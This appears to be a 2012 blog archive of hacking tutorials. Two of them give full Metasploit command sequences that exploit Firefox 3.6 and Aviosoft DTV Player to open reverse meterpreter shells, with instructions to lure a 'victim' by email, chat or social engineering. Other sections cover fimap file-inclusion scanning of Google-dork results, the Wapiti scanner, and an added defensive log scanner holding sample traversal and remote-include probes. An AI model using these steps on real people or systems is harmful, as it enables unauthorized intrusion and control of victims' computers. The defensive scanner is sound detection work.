Archive for June, 2012
Hack Remote PC using Mozilla Firefox “nsTreeRange” Dangling Pointer Vulnerability
This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides, it is possible to bypass DEP without the need for a ROP chain. Sadly this exploit is still either dependent on Java or bound by ASLR, because Firefox doesn’t employ any ASLR-free modules anymore.
Exploit Targets
Mozilla Firefox 3.6.16
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open the Backtrack terminal and type msfconsole

Now type use exploit/windows/browser/mozilla_nstreerange
Msf exploit (mozilla_nstreerange)>set payload windows/meterpreter/reverse_tcp
Msf exploit (mozilla_nstreerange)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (mozilla_nstreerange)>set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (mozilla_nstreerange)>set uripath nstreerange (The Url to use for this exploit)
Msf exploit (mozilla_nstreerange)>exploit

Now the URL you should give to your victim is http://192.168.1.4:8080/nstreerange

Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number, then type “sessions -i ID” to connect to that session.
LFI/RFI Testing and Exploiting with fimap
Fimap is a small Python tool which can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps. Fimap is meant to be something like sqlmap, but for LFI/RFI bugs instead of SQL injection. It’s currently under heavy development, but it’s usable.
Open your Backtrack terminal and type
cd /pentest/web/fimap
Scan a single URL for FI errors
./fimap.py -u "http://www.example.com/test.php?file=bang&id=23"

Scan Google search results for FI errors
./fimap.py -g -q inurl:include.php

Harvest all links of a webpage
./fimap.py -H -u http://example.com -d 3 -w /tmp/urllist

- -m is for mass scanning
- -l is for list
- Scan websites using Google dorks:
- ./fimap.py -g -q 'inurl:include.php'
- -g is for searching from Google
- -q stands for the query to be searched in Google.
Website: http://fimap.googlecode.com
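As an added example (not part of the original post and not fimap's own code), this Python script shows the defensive counterpart to the scans above: parsing web server access logs and flagging the file-inclusion probes a scanner like fimap sends (directory traversal, remote URLs, PHP stream wrappers and null-byte truncation in query parameters). The log lines, IP addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2012:10:01:02 +0000] "GET /test.php?file=bang&id=23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jun/2012:10:01:03 +0000] "GET /test.php?file=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "fimap"
10.0.0.9 - - [12/Jun/2012:10:01:04 +0000] "GET /include.php?page=http://attacker.example/x.txt HTTP/1.1" 200 77 "-" "fimap"
10.0.0.9 - - [12/Jun/2012:10:01:05 +0000] "GET /include.php?page=php://filter/resource=index.php HTTP/1.1" 200 9000 "-" "fimap"
10.0.0.7 - - [12/Jun/2012:10:01:06 +0000] "GET /test.php?file=about%00.php HTTP/1.1" 200 300 "-" "curl/7.2"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to a fully URL-decoded parameter value.
RULES = [
    ("path traversal", re.compile(r"\.\./|\.\.\\")),
    ("remote include (RFI)", re.compile(r"^(https?|ftp)://", re.I)),
    ("PHP stream wrapper", re.compile(r"^(php|data|expect|phar)://", re.I)),
    ("null-byte truncation", re.compile("\x00")),
]


def inspect_request(target):
    """Return [(param, reason), ...] for every suspicious query parameter in a request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl already decoded once; this catches double encoding
        for reason, pattern in RULES:
            if pattern.search(decoded):
                findings.append((name, reason))
    return findings


def scan_log(text):
    """Scan access-log text and return one alert dict per suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for param, reason in inspect_request(m["target"]):
            alerts.append({"ip": m["ip"], "target": m["target"], "param": param,
                           "reason": reason, "status": m["status"]})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ip"]}: {alert["reason"]} in "{alert["param"]}" ({alert["target"]})')
```

A 200 status on a traversal request (as on the second sample line) is the case worth investigating first, since it suggests the include actually succeeded rather than being rejected.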
Hack Remote PC using Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow
This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a playlist file onto the stack, which may result in arbitrary code execution under the context of the user.
Exploit Targets
Aviosoft DTV Player 1.0.1.2
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open the Backtrack terminal and type msfconsole

Now type use exploit/windows/fileformat/aviosoft_plf_buf
Msf exploit (aviosoft_plf_buf)>set payload windows/meterpreter/reverse_tcp
Msf exploit (aviosoft_plf_buf)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (aviosoft_plf_buf)>exploit

After the malicious file is generated successfully, it is stored on your local computer at
/root/.msf4/local/msf.plf

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send the msf.plf file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.


Wapiti – Web application vulnerability scanner
Wapiti allows you to audit the security of your web applications. It performs “black-box” scans, i.e. it does not study the source code of the application but scans the web pages of the deployed web app, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.
Wapiti can detect the following vulnerabilities:
- File Handling Errors (Local and remote include/require, fopen, readfile…)
- Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
- XSS (Cross Site Scripting) Injection
- LDAP Injection
- Command Execution detection (eval(), system(), passthru()…)
- CRLF Injection (HTTP Response Splitting, session fixation…)
How to use wapiti
Open your Backtrack terminal and type
cd /pentest/web/wapiti
python wapiti.py http://example.com

The application generates an HTML report in generated_report/index.html, which contains detailed information about the attacks performed and the vulnerabilities found.
